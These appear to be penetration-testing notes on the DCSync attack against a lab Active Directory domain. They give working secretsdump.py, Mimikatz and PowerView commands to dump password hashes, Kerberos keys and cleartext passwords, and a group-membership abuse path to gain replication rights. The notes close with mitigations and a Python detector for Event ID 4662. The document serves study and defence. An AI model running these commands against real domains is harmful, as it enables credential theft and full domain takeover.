# DCSync

## Overview

* DCSync extracts account secrets from the Active Directory database by abusing the built-in Directory Replication Service Remote Protocol (MS-DRSR)
* The attacker mimics a Domain Controller's replication request to retrieve user NTLM password hashes and Kerberos keys
* Requires `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` extended rights
* Domain/Enterprise Admins have this right by default

## Checking for DCSync Rights

### PowerView

```powershell
$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
```

### BloodHound

* Use pre-built query: "Find Principals with DCSync Rights"

## Performing DCSync

### From Linux with secretsdump.py

```bash
# Dump all hashes
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

# NTLM hashes only
secretsdump.py -just-dc-ntlm INLANEFREIGHT/adunn@172.16.5.5

# Specific user only
secretsdump.py -just-dc-user administrator INLANEFREIGHT/adunn@172.16.5.5

# Additional useful flags
# -pwd-last-set    Show when each password was last changed
# -history         Dump password history
# -user-status     Show if user is disabled
```

### From Windows with Mimikatz

```
# Must run as user with DCSync rights (use runas if needed)
runas /netonly /user:INLANEFREIGHT\adunn powershell

# In the new PowerShell session
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
```

## Output Files

* When `-outputfile` is combined with `-just-dc`, three files are written with that prefix:
  * `.ntds` - NTLM hashes
  * `.ntds.kerberos` - Kerberos keys
  * `.ntds.cleartext` - Cleartext passwords (accounts with reversible encryption)

## Reversible Encryption

* Accounts with "Store passwords using reversible encryption" enabled have their passwords stored RC4-encrypted rather than hashed
* Because that encryption can be reversed with the Syskey, tools like secretsdump.py output these passwords in cleartext (the `.ntds.cleartext` file)
* Check for accounts with reversible encryption:

```powershell
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

# PowerView
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | select samaccountname,useraccountcontrol
```

## DCSync via Group Membership Abuse

If you have GenericAll over a group that holds DCSync rights (shown in BloodHound as the `GetChanges` and `GetChangesAll` edges), add yourself to that group and then perform DCSync.

### Add User to Privileged Group

```powershell
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword)

$group = Convert-NameToSid "Server Admins"
Add-DomainGroupMember -Identity $group -Members 'targetuser' -Credential $Cred -Verbose
```

### DCSync After Group Addition

```bash
secretsdump.py targetuser@DC_IP -just-dc-ntlm
```

### Cleanup

```powershell
Remove-DomainGroupMember -Identity "Server Admins" -Members 'targetuser' -Credential $Cred -Verbose
```

***

## Mitigation

* Limit accounts with DCSync rights to only Domain Controllers
* Monitor for replication requests from non-DC sources
* Audit the `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` permissions regularly
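As an added example (not part of the original notes), the following Python detection logic implements the monitoring point above: it scans Security log Event ID 4662 records for the well-known replication control-access-right GUIDs and flags any that were not raised by a known Domain Controller computer account. The event records and the DC account list are constructed sample data; in practice they would come from your SIEM export and the Domain Controllers OU.

```python
"""Flag Event ID 4662 replication-access events raised by non-DC principals."""
import re

# Well-known control-access-right GUIDs from the AD schema that DCSync exercises.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events in the shape of the 4662 fields a SIEM would export:
# SubjectUserName, SubjectDomainName and Properties (the GUID list from the event).
# The last GUID in the third event is a made-up placeholder for an unrelated object access.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "INLANEFREIGHT",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "adunn", "SubjectDomainName": "INLANEFREIGHT",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "adunn", "SubjectDomainName": "INLANEFREIGHT",
     "Properties": "{d8a43b41-0000-4000-8000-000000000001}"},
    {"EventID": 4624, "SubjectUserName": "adunn", "SubjectDomainName": "INLANEFREIGHT",
     "Properties": ""},
]

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def find_dcsync_events(events, dc_accounts):
    """Return (DOMAIN\\subject, [right names]) for every 4662 event that
    exercised a replication right and was not raised by a DC computer account.
    DC-to-DC replication is expected and is suppressed; anything else is an alert."""
    known_dcs = {acct.upper() for acct in dc_accounts}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = (g.lower() for g in GUID_RE.findall(ev.get("Properties", "")))
        rights = sorted({REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS})
        if not rights or ev["SubjectUserName"].upper() in known_dcs:
            continue
        hits.append((f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}", rights))
    return hits


if __name__ == "__main__":
    for subject, rights in find_dcsync_events(SAMPLE_EVENTS, ["DC01$"]):
        print(f"ALERT possible DCSync by {subject}: {', '.join(rights)}")
```

The DC allow-list should be built from the actual Domain Controller computer accounts, not typed by hand, so that a newly promoted DC does not generate false positives.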

